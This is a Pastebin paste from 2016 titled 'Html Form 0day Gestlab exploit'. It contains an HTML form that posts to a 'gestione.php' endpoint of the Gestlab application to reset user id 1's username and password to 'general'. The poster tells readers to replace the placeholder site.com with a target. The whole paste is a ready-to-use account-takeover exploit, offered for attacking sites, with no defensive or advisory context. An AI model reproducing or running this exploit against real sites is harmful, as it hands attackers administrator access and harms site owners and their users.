Advertisement
GeneralEG

Html Form 0day Gestlab exploit #GeneralEG

Jun 12th, 2016
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.55 KB | None | 0 0
  1. <form method="post" action="http://site.com/gestlab/gestione.php" enctype="multipart/form-data">
  2.     iduser : <input type="text" name="iduser" value="1"><br> <!-- user id   -->
  3.     user : <input type="text" name="user" value="general"><br> <!-- new username -->
  4.     pass : <input type="text" name="pass" value="general"><br> <!-- new password -->
  5.     <input type="submit" name="submit" value="moduser">
  6.  
  7.  
  8. *** change site.com with the target ***
  9. *** the new username and password  is general ***
  10. #GeneralEG
  11. https://www.youtube.com/channel/UCgA8sMFKCp4P2QutQwZ1dGQ
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement